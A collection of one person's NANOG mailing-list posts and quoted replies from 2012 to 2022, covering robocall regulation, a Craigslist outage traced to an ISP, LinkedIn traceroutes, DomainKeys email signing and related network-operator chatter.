Phishing and telemarketing telephone calls

[Matthew Black]

Has anyone else noticed a steep decline in annoying phone calls since the FCC 
threatened legal action against three major VOIP gateways if they didn't make 
efforts to prevent Caller ID spoofing from scammers?


Writing on behalf of myself and not any organization or employer. Please remove 
me from your mailing and contact lists.

RE: Phishing and telemarketing telephone calls

[Matthew Black]

Oh, never mind. I just saw a similar thread: FCC and FTC Demand Cut-Off 
Robercallers of Coronavirus Scam

The free Marriott vacation and Social Security Number suspension calls are no 
more!



From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Matthew Black
Sent: Friday, April 24, 2020 4:26 PM
To: North American Network Operators' Group
Subject: Phishing and telemarketing telephone calls

Has anyone else noticed a steep decline in annoying phone calls since the FCC 
threatened legal action against three major VOIP gateways if they didn't make 
efforts to prevent Caller ID spoofing from scammers?


Writing on behalf of myself and not any organization or employer. Please remove 
me from your mailing and contact lists.

RE: Phishing and telemarketing telephone calls

[Matthew Black]

Good grief, selling a kit for $47. Since all robocalls employ Caller ID 
spoofing, just how does one prove who called? Will the telephone company simply 
hand over detailed transport records or the hidden Caller ID information? I 
don't care about making money or imposition of government fines; I just want 
the calls to cease.

mb

Writing on behalf of myself and not any organization or employer. Please remove 
me from your mailing and contact lists.



-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Anne P. Mitchell, Esq.
Sent: Saturday, April 25, 2020 10:23 AM
To: nanog@nanog.org
Subject: Re: Phishing and telemarketing telephone calls



> On Apr 24, 2020, at 5:36 PM, Jon Lewis  wrote:
> 
> On Fri, 24 Apr 2020, Matthew Black wrote:
> 
>> Has anyone else noticed a steep decline in annoying phone calls since the 
>> FCC threatened legal action against three major VOIP gateways if they didn’t 
>> make efforts to prevent
>> Caller ID spoofing from scammers?
> 
> Not that it's at all on-topic for NANOG, but no.  I still get numerous "last 
> chance to renew my car warranty" and whatever the scam is from the credit 
> card callers per day on both my home and cell numbers.

Well, while we are already engaged in the thread, some of you may be interested 
to know (especially if you find yourself with time on your hands these days), 
that you *can* actually get money from these scum.  In fact, it turns out that 
they cave pretty easily because they *know* they are violating the law, and 
they *know* what the penalties are.  

In fact, we wrote up how to do it (link below) and I *know* that it works 
because I just got myself $1000 out of a text message spammer!   

So, harass those phone spammers for fun *and* profit! ;-)  Here's the write-up 
I did, feel free to ask me any questions you may have. :-)

https://www.theinternetpatrol.com/how-to-shake-down-robocallers-and-robotexters-for-fun-and-profit/

Anne

--
Anne P. Mitchell, Attorney at Law
Dean of Cyberlaw & Cybersecurity, Lincoln Law School
CEO/President, SuretyMail Email Reputation Certification
Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law)
Legislative Consultant, GDPR, CCPA (CA) & CCDPA (CO) Compliance Consultant
Board of Directors, Denver Internet Exchange
Former Counsel: Mail Abuse Prevention System (MAPS)

RE: [outages] facebook slow

[Matthew Black]

My concern against using FB for authentication is this: Does using FB login 
give the site read access to my profile, friends, etc? My profile is set to 
private to keep advertisers at bay. In the early years Facebook warned users 
that clicking on an external link would grant such access.

matthew


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of 
valdis.kletni...@vt.edu
Sent: Friday, November 30, 2018 1:12 PM
To: Keith Medcalf
Cc: nanog@nanog.org; Brian Ladd
Subject: Re: [outages] facebook slow

On Fri, 30 Nov 2018 13:16:31 -0700, "Keith Medcalf" said:
> Why don't you just write all your password on big sheets of 
> construction paper and put them on the front of the building or in the 
> nearest Starbucks?

I'm going to go out on a limb and say that with all the problems inherent in 
using a social media account as an authenticator, for 95% of sites it's still 
more secure than if they attempted to create their own authentication system.
Having even less security expertise than Facebook, they will probably get wrong 
(possibly in a subtle fashion that gets quietly exploited for years, and 
possibly in a spectacular fashion that makes it on the evening news).

There's the additional factor that security is always about trade-offs - for 
many sites, the dangers of using social media logins are *far* outweighed by 
being able to just have a big shiny "Log in using Facebook" button instead of 
making the user set up an account, pick a password, send them a verification 
e-mail, then they have to read their e-mail and click on the link.  Do that, 
and they just left for another site.  Doesn't take many people leaving for 
another site before any added "security" added by doing authentication yourself 
is outweighed by lost traffic.

RE: A Zero Spam Mail System [Feedback Request]

[Matthew Black]

SIGH. I am far more inclined to listen to John Levine or Suresh 
Ramasubramanian, both who have been around for decades and have earned their 
chops with DMARC and Sendmail. Both with a proven track record, rather than 
someone lacking credentials. Since spam is a subjective term, I’d personally 
like to know how someone can design a solution that works for billions of 
people. Heck, you need to improve over existing technology that provides a 
false negative rate p < 0.01 and false positive p < 0.005.

Someone who thinks Gmail is e-mail 1.0 fails to grasp history. Have you ever 
created a sendmail.cf without using M4?

[This message represents views of the author and not any employer (present or 
former).]


From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Viruthagiri 
Thirumavalavan
Sent: Sunday, February 17, 2019 6:04 PM
To: nanog list
Subject: A Zero Spam Mail System [Feedback Request]

Hello Everyone,

My name is Viruthagiri Thirumavalavan. I'm the guy who proposed SMTP over TLS 
on Port 
26
 last month. I'm also the guy who attacked (???) John Levine.

Today I have something to show you.

Long story short I solved the email spam problem. Well... Actually I solved 
it long time back. I'm just ready to disclose it today. Again...

Yeah.. Yeah.. Yeah... If only I had a dime for every time people insult me for 
saying "I solved the spam problem"

They usually start with the insult like "You think you are the inventor of 
FUSSP?"

These guys always are the know-it-all assholes. They don't listen. They don't 
want to listen. They are like barking dogs. If one started to bark, everyone 
else gets the courage to do the same thing.

I'm tired of fighting these assholes in every mailing list.  I'm on your side 
morons. So how about you all knock it off?

Six months back, it was John Levine who humiliated me in the DMARC list. 
Apparently, for him 50 words are enough to attack me.

Töma Gavrichenkov and Suresh Ramasubramanian even started to defend this man 
saying 50 words are enough to judge a 50,000 words paper.  [We are gonna figure 
it out today]

--

@Töma Gavrichenkov

In theory, I can easily recall a few cases in my life when going
through just 50 words was quite enough for a judgment.

How can you be so sure that you didn't fuck up none of the lives of these "few 
cases"? Or in more technical terms, How can you be absolutely sure that there 
is no "False Positives"?

--

@Suresh Ramasubramanian

Yes, 50 words are more than enough to decide a bad idea is bad.  You don't have 
to like that, or like any of us, but facts are facts

Merely appending the text "facts are facts" not gonna convert a bullshit 
statement into a fact.

You know what's the meaning of the word "fact"? It's a statement that can be 
proved TRUE.

Let's do a little experiment. 100 researchers presents their lifetime work to 
us. Each of their research paper contain 50,000 words. We are gonna judge them.

You are gonna judge them based on only the first 50 words. And I'm gonna judge 
them by tossing a coin. Can you guess who is gonna fuck up less number of 
researcher lives?

I'm claiming that I solved the email spam problem. If that's true, then you 
should know, common sense is one of the very basic requirement for that.

I designed my email system. Every inch of it. I wrote my research paper. Every 
word of it. I made my prototype video. Every second of it. So I'm the captain 
of my ship. Not you. But you all think you know my system better than me? That 
too, with only 50 words?

My research paper has around 50,000 words. And you think 50 words are enough to 
judge my work? Let me make sure I get this right. You are all saying, you know 
what's in the rest of the 49,950 words based on only the first 50 words? That's 
stupid on so many levels.

If you are gonna do a half-assed job and relay that misinformation to thousands 
of people, why volunteer in the first place? And by the way, by saying you are 
all doing half-assed job, I'm actually insulting the people who are REALLY 
doing the half-assed job.

--

John Levine vs. me

One month back, some of you may have noticed a thread created by John 
Levine
 where he goes like "He's Forum Shopping". The whole gist of that message was 
"We already have DANE and MTA-STS. We don't a third solution". And then I used 
some harsh words to defend myself. But that was the Season 2 of his "Shitshow". 
The Season 1 was aired 6 months back. You all missed that show. This is what 
happened in Season 1.


  1.  Six months back, I posted on three mailing list saying "I solved the 
email spam problem" and asked them to provide feedback on my invention. Those 
three mailing lists were SPF, DKIM and DMARC. That's because my solution r

RE: FCC chairwoman: Fines alone aren't enough (Robocalls)

[Matthew Black]

I thought that SCOTUS ruled years ago that telco users possess a First 
Amendment right to spoof Caller ID.

Matthew


From: NANOG < > On Behalf Of Shane Ronan
Sent: Tuesday, October 04, 2022 11:22 AM
To: Michael Thomas 
Cc: nanog@nanog.org
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)

CAUTION: This email was sent from an external source.

Except the cost to do the data dips to determine the authorization isn't "free".

On Tue, Oct 4, 2022 at 2:18 PM Michael Thomas 
mailto:m...@mtcc.com>> wrote:


On 10/4/22 6:07 AM, Mike Hammett wrote:
I think the point the other Mike was trying to make was that if everyone 
policed their customers, this wouldn't be a problem. Since some don't, 
something else needed to be tried.


Exactly. And that doesn't require an elaborate PKI. Who is allowed to use what 
telephone numbers is an administrative issue for the ingress provider to 
police. It's the equivalent to gmail not allowing me to spoof whatever email 
address I want. The FCC could have required that ages ago.



Mike

-
Mike Hammett
Intelligent Computing Solutions
http://www.ics-il.com

Midwest-IX
http://www.midwest-ix.com


From: "Shane Ronan" 
To: "Michael Thomas" 
Cc: nanog@nanog.org
Sent: Monday, October 3, 2022 9:54:07 PM
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)
The issue isn't which 'prefixes' I accept from my customers, but which 
'prefixes' I accept from the people I peer with, because it's entirely dynamic 
and without a doing a database dip on EVERY call, I have to assume that my peer 
or my peers customer or my peers peer is doing the right thing.

I can't simply block traffic from a peer carrier, it's not allowed, so there 
has to be some mechanism to mark that a prefix should be allowed, which is what 
Shaken/Stir does.

Shane



On Mon, Oct 3, 2022 at 7:05 PM Michael Thomas 
mailto:m...@mtcc.com>> wrote:
The problem has always been solvable at the ingress provider. The
problem was that there was zero to negative incentive to do that. You
don't need an elaborate PKI to tell the ingress provider which prefixes
customers are allow to assert. It's pretty analogous to when submission
authentication was pretty nonexistent with email... there was no
incentive to not be an open relay sewer. Unlike email spam, SIP
signaling is pretty easy to determine whether it's spam. All it needed
was somebody to force regulation which unlike email there was always
jurisdiction with the FCC.

Mike

On 10/3/22 3:13 PM, Jawaid Bazyar wrote:
> We're talking about blocking other carriers.
>
> On 10/3/22, 3:05 PM, "Michael Thomas" mailto:m...@mtcc.com>> 
> wrote:
>
>  On 10/3/22 1:54 PM, Jawaid Bazyar wrote:
>  > Because it's illegal for common carriers to block traffic otherwise.
>
>  Wait, what? It's illegal to police their own users?
>
>  Mike
>
>  >
>  > On 10/3/22, 2:53 PM, "NANOG on behalf of Michael Thomas" 
> mailto:verobroadband@nanog.org>
>  on behalf of m...@mtcc.com> wrote:
>  >
>  >
>  >  On 10/3/22 1:34 PM, Sean Donelan wrote:
>  >  > 'Fines alone aren't enough:' FCC threatens to blacklist voice
>  >  > providers for flouting robocall rules
>  >  >
>  >  > 
> https://www.cyberscoop.com/fcc-robocall-fine-database-removal/
>  >  >
>  >  > [...]
>  >  > “This is a new era. If a provider doesn’t meet its obligations 
> under
>  >  > the law, it now faces expulsion from America’s phone networks. 
> Fines
>  >  > alone aren’t enough,” FCC chairwoman Jessica Rosenworcel said 
> in a
>  >  > statemen

RE: FCC chairwoman: Fines alone aren't enough (Robocalls)

[Matthew Black]

This might have been what I read years ago:

Teltech Systems Inc. v. Bryant, 5th Cir., No. 12-60027

https://news.bloomberglaw.com/us-law-week/states-cant-restrict-non-harmful-spoofing-preempted-by-federal-truth-in-caller-id-act
(requires login)

https://law.justia.com/cases/federal/appellate-courts/ca5/12-60027/12-60027-2012-12-10.html

matthew


From: Tom Beecher 
Sent: Wednesday, October 05, 2022 7:42 AM
To: Matthew Black 
Cc: nanog@nanog.org
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)

CAUTION: This email was sent from an external source.

I thought that SCOTUS ruled years ago that telco users possess a First 
Amendment right to spoof Caller ID.

If you are referring to Facebook v. Duguid , that's not what the ruling says at 
all.



On Wed, Oct 5, 2022 at 1:23 AM Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
I thought that SCOTUS ruled years ago that telco users possess a First 
Amendment right to spoof Caller ID.

Matthew


From: NANOG < > On Behalf Of Shane Ronan
Sent: Tuesday, October 04, 2022 11:22 AM
To: Michael Thomas mailto:m...@mtcc.com>>
Cc: nanog@nanog.org<mailto:nanog@nanog.org>
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)

CAUTION: This email was sent from an external source.

Except the cost to do the data dips to determine the authorization isn't "free".

On Tue, Oct 4, 2022 at 2:18 PM Michael Thomas 
mailto:m...@mtcc.com>> wrote:


On 10/4/22 6:07 AM, Mike Hammett wrote:
I think the point the other Mike was trying to make was that if everyone 
policed their customers, this wouldn't be a problem. Since some don't, 
something else needed to be tried.


Exactly. And that doesn't require an elaborate PKI. Who is allowed to use what 
telephone numbers is an administrative issue for the ingress provider to 
police. It's the equivalent to gmail not allowing me to spoof whatever email 
address I want. The FCC could have required that ages ago.



Mike

-
Mike Hammett
Intelligent Computing Solutions
http://www.ics-il.com<https://nam12.safelinks.protection.outlook.com/?url=http%3A%2F%2Fwww.ics-il.com%2F&data=05%7C01%7CMatthew.Black%40csulb.edu%7Cf4a98f61efc14329ef3508daa6dfd337%7Cd175679bacd34644be82af041982977a%7C0%7C0%7C63800577750367%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000%7C%7C%7C&sdata=ndbkfEIMzExkx0m0XlCMF9%2BG4u6J9GAHSj5vIg0Qblw%3D&reserved=0>

Midwest-IX
http://www.midwest-ix.com<https://nam12.safelinks.protection.outlook.com/?url=http%3A%2F%2Fwww.midwest-ix.com%2F&data=05%7C01%7CMatthew.Black%40csulb.edu%7Cf4a98f61efc14329ef3508daa6dfd337%7Cd175679bacd34644be82af041982977a%7C0%7C0%7C63800577750367%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C2000%7C%7C%7C&sdata=7xB9NY%2FM3cUB0iepIj4STpGARATRrzjfP7s4LOOow1M%3D&reserved=0>


From: "Shane Ronan" <mailto:sh...@ronan-online.com>
To: "Michael Thomas" <mailto:m...@mtcc.com>
Cc: nanog@nanog.org<mailto:nanog@nanog.org>
Sent: Monday, October 3, 2022 9:54:07 PM
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)
The issue isn't which 'prefixes' I accept from my customers, but which 
'prefixes' I accept from the people I peer with, because it's entirely dynamic 
and without a doing a database dip on EVERY call, I have to assume that my peer 
or my peers customer or my peers peer is doing the right thing.

I can't simply block traffic from a peer carrier, it's not allowed, so there 
has to be some mechanism to mark that a prefix should be allowed, which is what 
Shaken/Stir does.

Shane



On Mon, Oct 3, 2022 at 7:05 PM Michael Thomas 
mailto:m...@mtcc.com>> wrote:
The problem has always been solvable at the ingress provider. The
problem was that there was zero to negative incentive to do that. You
don't need an elaborate PKI to tell the ingress provider which prefixes
customers are allow to assert. It's pretty analogous to when submission
authentication was pretty nonexistent with email... there was no
incentive to not be an open relay sewer. Unlike email spam, SIP
signaling is pretty easy to determine whether it's spam. All it needed
was somebody to force regulation which unlike email there was always
jurisdiction with the FCC.

Mike

On 10/3/22 3:13 PM, Jawaid Bazyar wrote:
> We're talking about blocking other carriers.
>
> On 10/3/22, 3:05 PM, "Michael Thomas" mailto:m...@mtcc.com>> 
> wrote:
>
>  On 10/3/22 1:54 PM, Jawaid Bazyar wrote:
>  > Because it's illegal for common carriers to block traffic otherwise.
>
>  Wait, what? It's illegal to police their own users?
>
>  Mike
>
>  >
>  > On 

Craigslist outage

[Matthew Black]

Accessing from Southern California.

Cannot get any pages to view, except a few "about" pages.
http://www.craigslist.org/about/help/system-status.html

Status says runs good, but cannot pull up any city sites or the basic home page 
http://www.craigslist.org. 

Anyone else having trouble or are you able to get in?

matthew black
information technology services
california state university, long beach

RE: Craigslist outage

[Matthew Black]

www.craigslist.org, losangeles.craigslist.org and sfo.craigslist.org all ail.

matthew black
information technology services
california state university, long beach
562-985-5144


-Original Message-
From: David [mailto:dav...@mckendrick.ca] 
Sent: Saturday, January 28, 2012 1:02 AM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: Craigslist outage

Chicago loads, San Diego doesn't.
Interesting.

On Sat, 2012-01-28 at 08:56 +0000, Matthew Black wrote:
> Accessing from Southern California.
> 
> Cannot get any pages to view, except a few "about" pages.
> http://www.craigslist.org/about/help/system-status.html
> 
> Status says runs good, but cannot pull up any city sites or the basic home 
> page http://www.craigslist.org. 
> 
> Anyone else having trouble or are you able to get in?
> 
> matthew black
> information technology services
> california state university, long beach
> 
> 
> 
> 

RE: Craigslist outage

[Matthew Black]

Thanks everyone for the updates.

It looks like www.craigslist.org redirects to the nearest geographical 
craigslist site. Mine redirects to losangeles.craigslist.org, which is down.

Is it possible that some high-volume internet caching centers have gone down?

matthew black
information technology services
california state university, long beach
562-985-5144


-Original Message-
From: Henry Yen [mailto:he...@aegisinfosys.com] 
Sent: Saturday, January 28, 2012 1:06 AM
To: nanog@nanog.org
Subject: Re: Craigslist outage

On Sat, Jan 28, 2012 at 08:56:31AM +, Matthew Black wrote:
> Accessing from Southern California.
> 
> Cannot get any pages to view, except a few "about" pages.
> http://www.craigslist.org/about/help/system-status.html
> 
> Status says runs good, but cannot pull up any city sites or the basic home 
> page http://www.craigslist.org. 
> 
> Anyone else having trouble or are you able to get in?

Works fine from Long Island, NY.

I see that www.craigslist.org immediately loads geo.craigslist.org;
maybe the latter is broken? (From here, it subsequently loads
longisland.craigslist.org.)

-- 
Henry Yen   Aegis Information Systems, Inc.
Senior Systems Programmer   Hicksville, New York

RE: Craigslist outage

[Matthew Black]

Kind of supports my suspicion that a caching center (like Akamai) has gone down.

What does nslookup return for you? I get

losangeles.craigslist.org
208.82.238.129

DOS tracert finds that IP in 9 hops (20ms, 19ms, 19ms).

Possible routing problems for http traffic with Verizon FIOS?

The about page comes up

matthew black
information technology services
california state university, long beach


-Original Message-
From: Henry Yen [mailto:he...@aegisinfosys.com] 
Sent: Saturday, January 28, 2012 1:26 AM
To: nanog@nanog.org
Subject: Re: Craigslist outage

On Sat, Jan 28, 2012 at 09:14:52AM +, Matthew Black wrote:
> It looks like www.craigslist.org redirects to the nearest geographical 
> craigslist site. Mine redirects to losangeles.craigslist.org, which is 
> down.

losangeles.craigslist.org is working from here (Long Island, NY).

-- 
Henry Yen   Aegis Information Systems, Inc.
Senior Systems Programmer   Hicksville, New York

RE: Craigslist outage

[Matthew Black]

IE diagnose connection problem suggests a firewall issue.



matthew black

information technology services

california state university, long beach





-Original Message-
From: Matthew Black [mailto:matthew.bl...@csulb.edu]
Sent: Saturday, January 28, 2012 1:32 AM
To: nanog@nanog.org
Subject: RE: Craigslist outage



Kind of supports my suspicion that a caching center (like Akamai) has gone down.



What does nslookup return for you? I get



losangeles.craigslist.org

208.82.238.129



DOS tracert finds that IP in 9 hops (20ms, 19ms, 19ms).



Possible routing problems for http traffic with Verizon FIOS?



The about page comes up



matthew black

information technology services

california state university, long beach





-Original Message-

From: Henry Yen 
[mailto:he...@aegisinfosys.com]<mailto:[mailto:he...@aegisinfosys.com]>

Sent: Saturday, January 28, 2012 1:26 AM

To: nanog@nanog.org<mailto:nanog@nanog.org>

Subject: Re: Craigslist outage



On Sat, Jan 28, 2012 at 09:14:52AM +0000, Matthew Black wrote:

> It looks like www.craigslist.org<http://www.craigslist.org> redirects to the 
> nearest geographical

> craigslist site. Mine redirects to losangeles.craigslist.org, which is

> down.



losangeles.craigslist.org is working from here (Long Island, NY).



--

Henry Yen   Aegis Information Systems, Inc.

Senior Systems Programmer   Hicksville, New York

RE: Craigslist outage

[Matthew Black]

Confirmed that it's Verizon FIOS. I remote logged into a system at work and had 
no trouble.

I'm dealing with tech support person that says "nobody blocks websites or 
changes routing tables."  Big sigh.

Tech trying to get a supervisor and just came back with "he has another 
customer with the same problem."

Taking a deep breath.

Thanks all for your help!

matthew black
information technology services
california state university, long beach

From: Matthew Black
Sent: Saturday, January 28, 2012 1:39 AM
To: Matthew Black; nanog@nanog.org
Subject: RE: Craigslist outage


IE diagnose connection problem suggests a firewall issue.



matthew black

information technology services

california state university, long beach





-----Original Message-
From: Matthew Black [mailto:matthew.bl...@csulb.edu]
Sent: Saturday, January 28, 2012 1:32 AM
To: nanog@nanog.org
Subject: RE: Craigslist outage



Kind of supports my suspicion that a caching center (like Akamai) has gone down.



What does nslookup return for you? I get



losangeles.craigslist.org

208.82.238.129



DOS tracert finds that IP in 9 hops (20ms, 19ms, 19ms).



Possible routing problems for http traffic with Verizon FIOS?



The about page comes up



matthew black

information technology services

california state university, long beach





-Original Message-

From: Henry Yen 
[mailto:he...@aegisinfosys.com]<mailto:[mailto:he...@aegisinfosys.com]>

Sent: Saturday, January 28, 2012 1:26 AM

To: nanog@nanog.org<mailto:nanog@nanog.org>

Subject: Re: Craigslist outage



On Sat, Jan 28, 2012 at 09:14:52AM +, Matthew Black wrote:

> It looks like www.craigslist.org<http://www.craigslist.org> redirects to the 
> nearest geographical

> craigslist site. Mine redirects to losangeles.craigslist.org, which is

> down.



losangeles.craigslist.org is working from here (Long Island, NY).



--

Henry Yen   Aegis Information Systems, Inc.

Senior Systems Programmer   Hicksville, New York

RE: WW: Colo Vending Machine

[Matthew Black]

Take a look at Raritan. We use their product to gain remote access to system 
consoles. No more driving 100s of miles. Ok, it would be 200 feet for us.


matthew black
information technology services bh-188
california state university, long beach

-Original Message-
From: Jon Lewis [mailto:jle...@lewis.org] 
Sent: Monday, February 20, 2012 7:35 AM
To: nanog@nanog.org
Subject: Re: WW: Colo Vending Machine

On Sat, 18 Feb 2012, John Osmon wrote:

> At my $JOB[-1] they laughed at me when I pulled a Wyse out of the 
> trash bin and stuck it on a spare crash cart.
>
> Then I fixed something while they were still looking for USB-Serial, 
> etc.

Speaking of that sort of thing, I'd really LOVE if there were a device about 
the size of a netbook that could be hooked up to otherwise headless machines in 
colos that would give you keyboard, video & mouse.  i.e. a folding netbook 
shaped VGA monitor with USB keyboard and touchpad.  I know there are folding 
rackmount versions of this (i.e. from Dell), but I want something far more 
portable.  Twice in the past month, I'd had to drive 
100+ miles to a remote colo and took a full size flat panel monitor and
keyboard with me.  Has anyone actually built this yet?

--
  Jon Lewis, MCP :)   |  I route
  Senior Network Engineer |  therefore you are
  Atlantic Net|
_ http://www.lewis.org/~jlewis/pgp for PGP public key_

RE: Dyn DDoS this AM?

[Matthew Black]

LA Times: Why sites like Twitter and Spotify were down for East Coast users 
this morning
http://www.latimes.com/business/la-fi-tn-dyn-attack-20161021-snap-story.html




-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Chris Grundemann
Sent: Friday, October 21, 2016 7:56 AM
To: nanog@nanog.org
Subject: Dyn DDoS this AM?

Does anyone have any additional details? Seems to be over now, but I'm very
curious about the specifics of such a highly impactful attack (and it's
timing following NANOG 68)...

https://krebsonsecurity.com/2016/10/ddos-on-dyn-impacts-twitter-spotify-reddit/

-- 
@ChrisGrundemann
http://chrisgrundemann.com

RE: SoCal FIOS outage(?) / static IP readdressing

[Matthew Black]

I'm a Frontier FiOS customer in SoCal and have had trouble loading the Google 
home page for weeks. Had trouble loading Gmail last night. 

RE: Is LinkedIn down?

[Matthew Black]

I would cry for about 37 seconds if LinkedIn went down permanently. Then, get 
over it and not worry about their spam. Signed up when they first started but 
stopped using almost immediately when they kept requesting permission to access 
my contacts.

matthew black
[Note: speaking only for myself and not my employer or anyone else]


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Warren Bailey
Sent: Saturday, August 16, 2014 12:31 PM
To: stuart clark; Frank Bulk; nanog@nanog.org
Subject: Re: Is LinkedIn down?

I am still seeing plenty of spam from them, so I believe they are up.

//warren

On 8/16/14, 10:49 AM, "stuart clark"  wrote:

>Frank,
>
>Reverse is ok from L3's looking glass in Washington. SRC prefix for our 
>London DC is 108.171.128.0/24.
>
>Cheers!
>On Saturday, 16 August 2014, 18:26, Frank Bulk  wrote:
> 
>
>
>Stuart,
> 
>You haven¹t shared your IPs but you could go to Level3¹s Washington 
>Looking Glass and see if you can trace back to your UK and Frankfurt IPs.
> 
>Frank
> 
>From:stuart clark [mailto:stuartecl...@yahoo.com]
>Sent: Saturday, August 16, 2014 11:45 AM
>To: Frank Bulk; nanog@nanog.org
>Subject: Re: Is LinkedIn down?
> 
>Thanks Frank - www.linkedin.com is the one i see problems with testing 
>from two locations UK and Frankfurt. London TR is below.
>If i jump out of our AMS location (ASN109 - via AS1299 ) i dont see any 
>problems.
> 
>[root@ops-netops-util1 ~]# tcptraceroute linkedin.com Selected device 
>eth0, address 10.3.4.38, port 42311 for outgoing packets Tracing the 
>path to linkedin.com (216.52.242.86) on TCP port 80 (http),
>30 hops max
> 
>[removed]
> 
> 6  xe-5-0-0.edge5.London1.Level3.net (212.187.138.209)  1.078 ms  
>1.040 ms  1.159 ms
> 7  * * *
> 8  ae-56-221.ebr2.London1.Level3.net (4.69.153.129)  76.147 ms  75.863 
>ms  75.901 ms
> 9  * * *
>10  * * *
>11  ae-48-48.ebr2.Washington1.Level3.net (4.69.202.61)  75.557 ms  
>75.550 ms  75.511 ms
>12  ae-82-82.csw3.Washington1.Level3.net (4.69.134.154)  75.700 ms
>75.502 ms  75.644 ms
>13  ae-3-80.edge3.Washington4.Level3.net (4.69.149.146)  75.639 ms
>75.726 ms  75.692 ms
>14  LINKEDIN-CO.edge3.Washington4.Level3.net (4.53.116.150)  75.888 ms
>75.924 ms  75.912 ms
>15  * * *
>16  * * *
>17  * * *
>18  * * *
>19  199.101.162.230  149.661 ms  151.158 ms  149.616 ms
>20  careers.linkedin.com (216.52.242.86) [open]  149.264 ms  149.369 ms
>149.448 ms
> 
> 
>[root@ops-netops-util1 ~]# tcptraceroute www.linkedin.com Selected 
>device eth0, address 10.3.4.38, port 57760 for outgoing packets Tracing 
>the path to www.linkedin.com (108.174.2.129) on TCP port 80 (http), 30 
>hops max
> 
>[removed]
> 
> 5  xe-5-0-0.edge5.London1.Level3.net (212.187.138.209)  1.060 ms  
>1.082 ms  1.041 ms
> 6  * * *
> 7  ae-58-223.ebr2.London1.Level3.net (4.69.153.137)  75.830 ms  75.929 
>ms  75.739 ms
> 8  * * *
> 9  * * *
>10  ae-47-47.ebr2.Washington1.Level3.net (4.69.202.57)  75.950 ms  
>76.001 ms  75.942 ms
>11  * ae-82-82.csw3.Washington1.Level3.net (4.69.134.154) 75.713 ms
>75.589 ms
>12  ae-3-80.edge3.Washington4.Level3.net (4.69.149.146)  75.702 ms
>75.769 ms  75.748 ms
>13  LINKEDIN-CO.edge3.Washington4.Level3.net (4.53.116.150)  75.973 ms
>75.924 ms  76.664 ms
>14  * * *
>15  * * *
>[timesouts]
> 
>Cheers!
> 
>-SC (ASN25605)
> 
>On Saturday, 16 August 2014, 17:03, Frank Bulk  wrote:
> 
>Stuart,
>
>You don't tell us if it's www.linkedin.com or linkedin.com, but in any 
>case, because they serve up that site around the world using some form 
>of GLB it may resolve to different IP depending on where you are.  From 
>my perspective it is working via Cogent, and I can hit 108.174.2.129, 
>too:
>
>root@nagios:# tcptraceroute www.linkedin.com Selected device eth0.3, 
>address 96.31.0.5, port 43355 for outgoing packets Tracing the path to 
>www.linkedin.com (199.101.163.129) on TCP port 80 (www),
>30 hops max
>1  router-core-inside.mtcnet.net (96.31.0.254)  0.253 ms  0.193 ms  
>0.203 ms
>2  sxct.sxcy.mtcnet.net (167.142.156.197)  0.194 ms  0.131 ms  0.129 ms
>3  premier.sxcy-mlx.fbnt.netins.net (173.215.60.5)  1.632 ms  1.601 ms
>1.583 ms
>4  38.104.184.26  7.004 ms  6.373 ms  6.437 ms
>5  te0-0-1-1.rcr11.dsm01.atlas.cogentco.com (38.104.184.25)  5.913 ms
>6.083 ms  5.877 ms
>6  te0-2-0-0.ccr41.ord01.atlas.cogentco.com (154.54.46.237)  13.057 ms
>13.114 ms  13.075 ms
>7  be2156.ccr21.mci01.atlas.cogentco.com (154.54.6.85)  24.995 ms  
>24.942 ms  25.053  ms
>8  be2012.ccr21.dfw01.atlas.cogentco.com (154.54.2.114)  35.013 ms  
>34.942 ms  34.928 ms
>9  be2144.ccr21.iah01.atlas.cogentco.com (154.54.25.105)  40.455 ms
>40.749
&g

Are DomainKeys for e-mail signing dead?

[Matthew Black]

Apologies if I slept through prior discussions on the topic.



E-mail from our L-Soft LISTSERV was recently rejected by Yahoo with the 
following error:



#@YAHOO.COM

Last error: 5.7.9 554 5.7.9 Message not accepted for policy reasons. See 
http://postmaster.yahoo.com/errors/postmaster-28.html



I note:



1.   The e-mail error (5.7.9) references the link  
http://postmaster.yahoo.com/errors/postmaster-28.html.

2.   That Yahoo page does not mention error 5.7.9, but references a similar 
error 5.7.4 "Message not accepted for policy reasons."

3.   It appears that Yahoo wants inbound messages signed using DomainKeys 
technology.

4.   Yahoo is the lead inventor of DomainKeys, along with Cicso, PGP, and 
Sendmail.

5.   L-Soft LISTSERV manuals and Yahoo both refer to the website 
http://domainkeys.sourceforge.net/.

6.   When I click on the Documentation and DomainKeys Implementors Mailing 
List links on that page, I get page not found.

7.   A 2007 USA Today Article 
(http://usatoday30.usatoday.com/tech/products/cnet/2007-05-23-domainkeys-anti-spam_N.htm)
 mentions that DomainKeys have not been widely adopted.

8.   A basic Google search for DomainKeys comes up with no recent articles. 
One website (http://blog.wordtothewise.com/2011/09/dkim-is-done/) says that 
DKIM/DomainKeys are dead.





Are the rumors of the death of DomainKeys premature? If not, is anyone from 
Yahoo listening?



matthew black

california state university, long beach

RE: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

[Matthew Black]

Shouldn't a decent OS scrub RAM and disk sectors before allocating them to 
processes, unless that process enters processor privileged mode and sets a call 
flag? I recall digging through disk sectors on RSTS/E to look for passwords and 
other interesting stuff over 30 years ago.

matthew black
california state university, long beach

-Original Message-
From: Randy Bush [mailto:ra...@psg.com] 
Sent: Sunday, April 13, 2014 7:31 AM
